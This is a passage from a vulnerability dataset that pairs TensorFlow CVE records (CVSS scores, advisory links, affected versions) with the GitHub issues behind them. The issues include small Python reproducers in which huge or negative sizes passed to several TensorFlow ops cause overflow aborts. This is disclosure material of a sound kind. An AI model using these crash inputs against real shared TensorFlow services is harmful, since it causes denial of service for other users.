Expect a `ValueError` to be thrown if the input `pool_size` contains zero or negative values.
**Standalone code to reproduce the issue**
If the `pool_size` has `0`:
```
import tensorflow as tf
pool_size = [2, 2, 0]
layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size)
input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32)
res = layer(input_tensor) # crash
```
Outputs:
```
Floating point exception (core dumped)
```
If the `pool_size` has negative values:
```
import tensorflow as tf
pool_size = [2, 2, -2]
layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size,)
input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32)
res = layer(input_tensor)
print(res)
```
The output is a tensor with `shape`=`(3, 3, 9, 14, 12)` and all `inf` values. | tf.keras.layers.MaxPooling3D crashes | https://api.github.com/repos/tensorflow/tensorflow/issues/51936/comments | 8 | 2021-09-10T21:36:31Z | 2023-09-21T10:18:55Z | https://github.com/tensorflow/tensorflow/issues/51936 | 993,613,787 | 51,936 | 2,762 |
CVE-2021-41197 | 2021-11-05T20:15:07.843 | TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary. This is similar to CVE-2021-29584. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46890"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51908"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46890"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51908"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46890 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
The following APIs crash(abortion) when the given size is large
- tf.image.resiz
- tf.image.resize_with_crop_or_pad
- tf.image.pad_to_bounding_box
- tf.image.extract_glimpse
- `tf.keras.backend.resize_images`
**Describe the expected behavior**
expect exception messages if the input is not expected instead of crash
**Standalone code to reproduce the issue**
### `tf.image.resize`
~~~python
import tensorflow as tf
import numpy as np
tf.image.resize(images=np.ones((5,5,5)), size=[2065374891,1145309325])
~~~
Output:
~~~python
2021-02-03 17:41:13.484992: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -6619278462293758741)
Aborted (core dumped)
~~~
### `tf.image.resize_with_crop_or_pad`
~~~python
import tensorflow as tf
import numpy as np
tf.image.resize_with_crop_or_pad(image=np.ones((1,1,1)), target_height=5191549470, target_width=5191549470)
~~~
Output:
~~~python
2021-02-03 17:42:15.468265: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1)
Aborted (core dumped)
~~~
### `tf.image.pad_to_bounding_box`
~~~python
import tensorflow as tf
import numpy as np
tf.image.pad_to_bounding_box(image=np.ones((1,1,1)), target_height=5191549470, target_width=5191549470, offset_height=1, offset_width=1)
~~~
Output
~~~python
2021-02-03 17:42:52.556583: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1)
Aborted (core dumped)
~~~
### `tf.image.extract_glimpse`
~~~python
import tensorflow as tf
import numpy as np
tf.image.extract_glimpse(input=np.ones((5,5,5,5)), size=[1574700351, 451745106], offsets=np.ones((5,2)))
~~~
Output:
~~~python
2021-02-03 17:43:30.140277: F tensorflow/core/framework/tensor_shape.cc:338] Check failed: 0 <= n (0 vs. -662664649191246466)
Aborted (core dumped)
~~~
### `tf.keras.backend.resize_image`
~~~python
import tensorflow as tf
import numpy as np
tf.keras.backend.resize_images(x=np.ones((1,5,3,15)), height_factor=5628955348197345288, width_factor=5628955348197345288, data_format='channels_last')
~~~
Output:
~~~python
2021-02-03 17:54:01.192819: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -5948468124908472256)
Aborted (core dumped)
~~~ | tf.image.resize/resize_with_crop_or_pad/pad_to_bounding_box/extract_glimpse crash(abort) | https://api.github.com/repos/tensorflow/tensorflow/issues/46890/comments | 8 | 2021-02-03T17:44:30Z | 2021-10-27T23:23:50Z | https://github.com/tensorflow/tensorflow/issues/46890 | 800,555,472 | 46,890 | 2,763 |
CVE-2021-41197 | 2021-11-05T20:15:07.843 | TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary. This is similar to CVE-2021-29584. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46890"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51908"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46890"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51908"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/51908 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): Yes
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below): 2.6.0
- Python version: 3.6.8
- Bazel version (if compiling from source): N/A
- GCC/Compiler version (if compiling from source): N/A
- CUDA/cuDNN version: N/A
- GPU model and memory: N/A
**Describe the current behavior**
`tf.pad` crashes when the argument "paddings" has large values.
**Describe the expected behavior**
Expect an exception to be thrown if the input `paddings` is unexpected.
**Standalone code to reproduce the issue**
```
import tensorflow as tf
input_tensor = tf.random.uniform([1, 32, 32, 3], dtype=tf.float32)
paddings = [[125106557, 1415887920], [747509374, 2136925906], [413308538, 904601717], [1900762018, 831358864]]
res = tf.pad(input_tensor,paddings)
```
outputs:
```
2021-09-09 12:46:38.123113: F tensorflow/core/framework/tensor_shape.cc:352] Check failed: 0 <= new_num_elements (0 vs. -1)
Aborted (core dumped)
```
| tf.pad crashes with large paddings | https://api.github.com/repos/tensorflow/tensorflow/issues/51908/comments | 4 | 2021-09-09T18:05:47Z | 2021-09-13T00:39:36Z | https://github.com/tensorflow/tensorflow/issues/51908 | 992,494,182 | 51,908 | 2,764 |
CVE-2021-41198 | 2021-11-05T20:15:07.907 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.tile` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46911"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46911"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46911 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
`tf.keras.backend.tile` crash(aborts) when `n` is large
**Describe the expected behavior**
expect an exception message if the input unexpected instead of crash.
**Standalone code to reproduce the issue**
~~~python
import tensorflow as tf
import numpy as np
tf.keras.backend.tile(x=np.ones((1,1,1)), n=[100000000,100000000, 100000000])
~~~
Output
~~~python
2021-02-04 04:10:34.072054: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -1)
Aborted (core dumped)
~~~ | tf.keras.backend.tile crash(aborts) when n is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46911/comments | 4 | 2021-02-04T04:10:44Z | 2021-09-21T01:51:59Z | https://github.com/tensorflow/tensorflow/issues/46911 | 800,911,545 | 46,911 | 2,765 |
CVE-2021-41199 | 2021-11-05T20:15:07.970 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46914"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46914"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hx2-qx8j-qjqm"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "651EA851-E660-4E53-9F3E-B6B69D91326B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46914 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
`tf.keras.layers.UpSampling2D` crashes(aborts) when `size` is large
**Describe the expected behavior**
expect an exception message if the input unexpected instead of crash.
**Standalone code to reproduce the issue**
~~~python
import tensorflow as tf
import numpy as np
tf.keras.layers.UpSampling2D(size=1610637938, data_format='channels_first', interpolation='bilinear')(np.ones((5,1,1,1)))
~~~
Output:
~~~python
2021-02-04 04:44:48.936606: F tensorflow/core/framework/tensor_shape.cc:353] Check failed: 0 <= new_num_elements (0 vs. -5475971237085092396)
Aborted (core dumped)
~~~ | tf.keras.layers.UpSampling2D crashes(aborts) when size is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46914/comments | 5 | 2021-02-04T04:45:22Z | 2023-09-21T09:20:32Z | https://github.com/tensorflow/tensorflow/issues/46914 | 800,926,370 | 46,914 | 2,766 |
CVE-2021-41200 | 2021-11-05T20:15:08.037 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
